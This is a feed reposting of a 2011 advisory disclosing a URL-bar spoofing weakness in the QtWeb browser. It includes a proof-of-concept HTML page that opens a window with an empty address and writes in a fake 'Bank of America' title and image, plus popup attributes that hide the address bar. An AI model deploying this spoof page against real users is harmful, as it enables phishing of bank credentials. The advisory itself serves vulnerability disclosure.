		<description><![CDATA[################################################# QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks Vendor URL: http://www.qtweb.net/ Vendor bugtrack=&#62; http://code.google.com/p/qtweb/issues/detail?id=151 Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html Vendor notify: YES exploit available: YES ################################################## ################### Description By vendor ################### QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p><span id="more-1493"></span></p>
<pre class="brush: plain;">
#################################################
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof
or phishing attacks
Vendor URL: http://www.qtweb.net/
Vendor bugtrack=&gt; http://code.google.com/p/qtweb/issues/detail?id=151
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
Vendor notify: YES exploit available: YES
##################################################

###################
Description By vendor
###################

QtWeb Internet Browser - lightweight, secure and portable browser
having unique user interface and privacy features. QtWeb is an open
source project based on Nokia's Qt framework and Apple's WebKit
rendering engine (the same as being used in Apple Safari and Google
Chrome).

######################
Vulnerability Description
######################

In a normal case when navigate to a site, the browser shows real URL
But it has a weakness and a attacker can show a empty URL. This
weakness can be used for pishing or spoof attacks because you can
think that  you are in bank of america for example and the browser
don't show nothing in  URL:)
Whithout Any URL =&gt;

http://3.bp.blogspot.com/-fo5gIcETZwE/TomQza97d0I/AAAAAAAAAFw/hMl0NPCRvqA/s400/qt1.jpg

Also a attacker can compose a popup with atributes and it can be used
too for spoof or phishing attacks.
toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0
Popup Whithout Toolbars and address bar =&gt;

http://3.bp.blogspot.com/-fixIYjkGkCE/TomSNePdc4I/AAAAAAAAAF0/vSKXq1aufo8/s400/qt2.jpg

################
Versions afected
################

QTweb 3.7.2 Vulnerable
QTweb 3.7.3 (buils 087) Vulnerable
and posible prior versions.

######################
Proof Of Concept
######################
&lt;code&gt;&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;
&quot;http://www.w3.org/TR/html4/loose.dtd&quot;&gt;
&lt;html&gt;
&lt;head&gt;
  &lt;title&gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL
weakness Spoof testcase by Lostmon&lt;/title&gt;
  &lt;script type=&quot;text/javascript&quot;&gt;
var wx;
function invokePoC() {
  wx = open(&quot;:#:&quot;,&quot;newwin&quot;);
  setInterval(&quot;doit()&quot;,1);
}
function doit() {
  wx.document.open();
  wx.document.write(&quot;&lt;title&gt;Bank of America | Home |
Personal&lt;/title&gt;&lt;img
src='data:image/gif;base64,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'/&gt;&quot;);
}
  &lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;QTweb 3.7.2 and 3.7.3 (buils 087) document.open() URL weakness
Spoof testcase by Lostmon&lt;/h1&gt;
&lt;noscript&gt;&lt;p&gt;this testcase requires JavaScript to run.&lt;/p&gt;&lt;/noscript&gt;
